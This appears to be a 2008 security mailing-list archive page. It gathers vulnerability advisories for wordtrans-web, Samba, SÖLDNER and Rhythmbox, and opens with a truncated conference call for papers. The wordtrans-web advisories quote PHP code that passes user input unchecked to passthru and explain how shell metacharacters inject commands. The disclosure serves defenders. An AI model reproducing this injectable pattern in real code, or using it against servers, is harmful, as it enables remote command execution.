http://events.ccc.de/congress/2008/. For further information and questions please feel free to contact [EMAIL PROTECTED] Submissions === All proposals must be submitted online using our online lecture submission system at https://cccv.pentabarf.org/submission/25C3. Please follow the instructions given there. If you have any questions regarding your submission, feel free to contact us at [EMAIL PROTECTED] but do NOT submit your lecture via e-mail. Language 25C3 is an international event and we want to have a lot of interesting talks in English for the benefit of our growing number of international guests. So ideally we are looking for speakers who can give lectures and/or workshops in either English or German. But while we are interested in maximizing the quality of presentations, the topic and its relevance to our community are our main concern. So don't worry about your English skills: the language of a submission is not a criteria for accepting or rejecting it! If you feel insecure talking in English, have received criticism on your language skills from your audience before, or i
[SCANIT-2008-003] Wordtrans-web Remote Command Execution Vulnerability
Wordtrans-web Remote Command Execution Vulnerability
Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008
Filename: SCANIT-2008-003.txt
SCANIT ID: SCANIT-2008-003
Published: June 30th, 2008
I. Summary
Wordtrans is a free front-end graphical application that allows you to
look for
words in several dictionaries. It can also translate the word that the
user
selects with his mouse.
The latest Wordtrans version could allow a remote attacker to execute
arbitrary
code in the server, caused by an input validation error in the
wordtrans-web
package, which is a PHP-based Web interface for Wordtrans.
II. Affected Products
This vulnerability affects the wordtrans 1.1pre15 and probably previous
versions.
III. Details
When sending a request without the variable "command" or with an
undefined
command and any word in the variable "word", the variable "link_options"
receives one argument from the user, passed with the "advanced" variable
using
the POST method. Then, the variable "link_options" is concatenated with
the
variable "exec_wordtrans". Since "exec_wordtrans" is passed to the
function
"passthru" without checking for special characters, we can send shell
characters
like | or ; to execute commands in the machine with privileges of the
Web server
process when the URL is submitted. This is part of vulnerable script
from
wordtrans 1.1pre15:
...
$exec_wordtrans = $wordtrans . "-d \"$dict\" ";
switch ($_GET['command']) {
...
default:
if ($_POST['word'] != "") {
if ($_POST['fullwords']) $exec_wordtrans .= " +w "; else
$exec_wordtrans .= " -w ";
if ($_POST['casesensitive']) $exec_wordtrans .= " +c "; else
$exec_wordtrans .= " -c ";
if ($_POST['invertir']) $exec_wordtrans .= " +i "; else
$exec_wordtrans .= " -i ";
if ($_POST['noacentos']) $exec_wordtrans .= " +g "; else
$exec_wordtrans .= " -g ";
$link_options = "--html-link-options \"?lang=
$lang_case&advanced=".$_POST['advanced']."&\" ";
$exec_wordtrans .= $link_options;
$exec_wordtrans .= "\"".$_POST['word']."\"";
passthru($exec_wordtrans);
...
To exploit this vulnerability, the "Magic Quotes" option needs to be
unset.
But since this option was removed from PHP since version 6.0.0, this is
a
critical vulnerability.
IV. Solution
No vendor response.
V. Timeline
March 10th, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
June 30th, 2008 - Advisory release
VI. Credits
This vulnerability was discovered by Scanit's researchers Filipe
Balestra
and Rodrigo Rubira Branco (BSDaemon)
.
VII. Contact
Scanit's R&D Labs represent Scanit's efforts in security research
activities.
By keeping track of the newest deffensive and offensive technologies,
Scanit's
researchers are able to contribute with unpublished works made in-house.
This
way, by driving the state-of-the-art in computer security, Scanit honors
its
commitment to stay in the front line of scientific evolution.
Reach us at [EMAIL PROTECTED]
Visit http://www.scanit.net
VIII. Disclaimer
The information contained in this document may change without notice.
Use of
this information constitutes acceptance for use in an "AS IS" condition.
There
are no warranties regarding the topicality, correctness, completeness or
quality of the information provided by this document. Under no
circumstances
shall the authors be held liable for any direct, indirect, or
consequential
damages, losses, injuries, or unlawful offences allegedly arising from
the use
of this information.
Copyright 2008 Scanit Middle East FZ/LLC
[USN-617-2] Samba regression
=== Ubuntu Security Notice USN-617-2 June 30, 2008 samba regression CVE-2008-1105, https://bugs.launchpad.net/bugs/241448 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libsmbclient3.0.22-1ubuntu3.8 Ubuntu 7.04: libsmbclient3.0.24-2ubuntu1.7 Ubuntu 7.10: libsmbclient3.0.26a-1ubuntu2.5 Ubuntu 8.04 LTS: libsmbclient3.0.28a-1ubuntu4.4 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-617-1 fixed vulnerabilities in Samba. The upstream patch introduced a regression where under certain circumstances accessing large files might cause the client to report an invalid packet length error. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Samba developers discovered that nmbd could be made to overrun a buffer during the processing of GETDC logon server requests. When samba is configured as a Primary or Backup Domain Controller, a remote attacker could send malicious logon requests and possibly cause a denial of service. (CVE-2007-4572) Alin Rad Pop of Secunia Research discovered that Samba did not properly perform bounds checking when parsing SMB replies. A remote attacker could send crafted SMB packets and execute arbitrary code. (CVE-2008-1105) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.8.diff.gz Size/MD5: 157652 196d8c9a0a200735dfa689ed2e1d9a54 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.8.dsc Size/MD5: 1195 939b82a27aea77ee5991dea27e7cb622 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22.orig.tar.gz Size/MD5: 17542657 5c39505af17cf5caf3d6ed8bab135036 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.0.22-1ubuntu3.8_all.deb Size/MD5: 6594438 2fb29bdafb2791293e404c2e4d1dd900 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.0.22-1ubuntu3.8_all.deb Size/MD5: 6902006 7c4b90a96e27d324fbe9b6dc794fb528 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 426734 734bd91be697e3cae2135196d6c9a965 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 112626 fb18b31f9d1e4667c6ec060d667953dd http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 798508 6eaad82261cf086b91ea8a082467ed0c http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 5974368 3e1cf92f3842b472ae25e6df94e272f7 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 2414790 14233ad46b4904a07cea5aea65954010 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 11893378 af74336d7c7ed64270ef1b718b3bf4e1 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 3404406 e8c8529e0df7d7579bc24d080dcb0602 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 4042528 4e7a4791d446f51758ddcda2b18c964a http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 449570 54c844e69f423e84839a1bfdda5d8af3 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 833370 835d19f03142dcec6467fea142b494f0 http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.0.22-1ubuntu3.8_amd64.deb Size/MD5: 1930534 cad1f12491874ac430a25af1cd402d8b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.22-1ubuntu3.8_i386.deb Size/MD5: 366380 2d19d277c4689cdd4483683e9e87895f http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.22-1ubuntu3.8_i386.deb Size/MD5: 112626 3e80697a98ea1506ef8e6fea313ddd57 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.22-1ubuntu3.8_i386.deb Size/MD5: 683396 b75642743efde743f8e549526a649049 http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.22-1ubuntu3.8_i386.deb Size/MD5: 5068276 0be4ae16c1a
[SCANIT-2008-002] Wordtrans-web Remote Command Execution Vulnerability
Wordtrans-web Remote Command Execution Vulnerability
Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008
Filename: SCANIT-2008-002.txt
SCANIT ID: SCANIT-2008-002
Published: June 30th, 2008
I. Summary
Wordtrans is a free front-end graphical application that allows you to
look for
words in several dictionaries. It can also translate the word that the
user
selects with his mouse.
The latest Wordtrans version could allow a remote attacker to execute
arbitrary
code in the server, caused by an input validation error in the
wordtrans-web
package, which is a PHP-based Web interface for Wordtrans.
II. Affected Products
This vulnerability affects the wordtrans 1.1pre15 and probably previous
versions.
III. Details
By Sending a GET request with the variable "command" set to 'show_desc',
the
variable "link_options" receives one argument from the user, passed via
the
"advanced" variable using the GET method. Then, the variable
"link_options" is
concatenated with the variable "exec_wordtrans". Since "exec_wordtrans"
is
passed to the function "passthru" without checking for special
characters, an
attacker can send shell characters like | or ; to execute commands in
the
machine with the privileges of the Web server process at the time the
URL is
submitted. This is part of vulnerable script from wordtrans 1.1pre15:
...
$exec_wordtrans = $wordtrans . "-d \"$dict\" ";
switch ($_GET['command']) {
case "show_desc":
$exec_wordtrans .= "--desc ";
$link_options = "--html-link-options \"?lang=
$lang_case&advanced=".$_GET['advanced']."&\" ";
$exec_wordtrans .= $link_options;
passthru($exec_wordtrans);
break;
...
To exploit this vulnerability, the "Magic Quotes" option needs to be
unset.
But since this option was removed from PHP since version 6.0.0, this is
a
critical vulnerability.
IV. Solution
No vendor response.
V. Timeline
March 1st, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
June 30th, 2008 - Advisory release
VI. Credits
This vulnerability was discovered by Scanit's researchers Filipe
Balestra
and Rodrigo Rubira Branco (BSDaemon)
.
VII. Contact
Scanit's R&D Labs represent Scanit's efforts in security research
activities.
By keeping track of the newest deffensive and offensive technologies,
Scanit's
researchers are able to contribute with unpublished works made in-house.
This
way, by driving the state-of-the-art in computer security, Scanit honors
its
commitment to stay in the front line of scientific evolution.
Reach us at [EMAIL PROTECTED]
Visit http://www.scanit.net
VIII. Disclaimer
The information contained in this document may change without notice.
Use of
this information constitutes acceptance for use in an "AS IS" condition.
There
are no warranties regarding the topicality, correctness, completeness
or
quality of the information provided by this document. Under no
circumstances
shall the authors be held liable for any direct, indirect, or
consequential
damages, losses, injuries, or unlawful offences allegedly arising from
the use
of this information.
Copyright 2008 Scanit Middle East FZ/LLC
Endless loop in Soldner 33724
### Luigi Auriemma Application: SÖLDNER - Secret Wars http://www.secretwars.net http://soldner.jowood.com Versions: <= 33724 Platforms:Windows Bug: endless loop Exploitation: remote, versus server Date: 01 Jul 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === SÖLDNER is a tactical military game developed by Wings Simulations and released in May 2004. ### == 2) Bug == Each UDP packet for this game can contain various blocks of data. The type 0x80 forces the server to perform a cycle from zero to the 32 bit number (so max 0x) specified in that data block. The maximum size of a packet supported by the game is 1400 bytes in which is possible to place max 233 blocks of this type causing the freeze of a server for over 2 hours (tested with a fast CPU). ### === 3) The Code === http://aluigi.org/poc/usurdat.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org
Re: Rhythmbox Vulnerability
Application: Rhythmbox 0.11.5 OS: Linux - Ubuntu 8.04 Original Advisory: http://packetstormsecurity.org/0806-advisories/rhythmbox-dos.txt The original author of this advisory is Juan Pablo Lopez Yacubian Author of this advisory: WarGame - http://vx.netlux.org/wargamevx - [EMAIL PROTECTED] Compiling Rhythmbox 0.11.5 with debug support (-g) and making it parse the DoS playlist file you can get this backtrace: (gdb) run /home/wargame/prova.pls The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/wargame/test/bin/rhythmbox /home/wargame/prova.pls [Thread debugging using libthread_db enabled] [New Thread 0x7f01a0a907c0 (LWP 1757)] [New Thread 0x41691950 (LWP 1760)] (rhythmbox:1757): Rhythmbox-WARNING **: Unable to grab media player keys: Could not get owner of name 'org.gnome.SettingsDaemon': no such name [New Thread 0x41e92950 (LWP 1761)] [Thread 0x41e92950 (LWP 1761) exited] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7f01a0a907c0 (LWP 1757)] 0x00dc8820 in ?? () (gdb) backtrace #0 0x00dc8820 in ?? () #1 0x7f019a5306f1 in g_hash_table_lookup () from /usr/lib/libglib-2.0.so.0 #2 0x00436487 in playlist_load_ended_cb (parser=0xdc1a00, uri=0xda34d0 "", metadata=0xbe7b90, mgr=0x7fffa8acd250) at rb-playlist-manager.c:576 #3 0x7f019b32dbcf in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0 #4 0x7f019b3416bc in ?? () from /usr/lib/libgobject-2.0.so.0 #5 0x7f019b3430d5 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0 #6 0x7f019b343483 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0 #7 0x7f019ef89611 in ?? () from /usr/lib/libtotem-plparser.so.10 #8 0x7f019ef8970e in ?? () from /usr/lib/libtotem-plparser.so.10 #9 0x7f019ef85b2c in ?? () from /usr/lib/libtotem-plparser.so.10 #10 0x004365e0 in rb_playlist_manager_parse_file (mgr=0xbe7b90, uri=0xdc8c00 "file:///home/wargame/prova.pls", error=0x7fffa8acd818) at rb-playlist-manager.c:621 #11 0x00426375 in rb_shell_load_uri (shell=0x7c81a0, uri=0xdc8c00 "file:///home/wargame/prova.pls", play=1, error=0x7fffa8acd818) at rb-shell.c:3326 #12 0x0041e4cf in local_load_uri (filename=0xdc8c00 "file:///home/wargame/prova.pls", shell=0x7c81a0) at main.c:414 #13 0x0041e32b in load_uri_args (args=0x6b2150, handler=0x41e476 , user_data=0x7c81a0) at main.c:371 #14 0x0041e474 in removable_media_scan_finished (shell=0x7c81a0, data=0x0) at main.c:406 #15 0x7f019b32dbcf in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0 #16 0x7f019b3416bc in ?? () from /usr/lib/libgobject-2.0.so.0 #17 0x7f019b3430d5 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0 #18 0x7f019b343483 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0 #19 0x00421066 in _scan_idle (shell=0x7c81a0) at rb-shell.c:1296 #20 0x7f019a53d262 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0 #21 0x7f019a540516 in ?? () from /usr/lib/libglib-2.0.so.0 ---Type to continue, or q to quit--- #22 0x7f019a5407d7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0 #23 0x7f019d041f03 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0 #24 0x0041e1bf in main (argc=2, argv=0x7fffa8ace278) at main.c:327 (gdb) Interesting info at rb-playlist-manager.c:576 : title = g_hash_table_lookup (metadata, TOTEM_PL_PARSER_FIELD_TITLE); In my opinion the crash happens around this function call. Have fun!
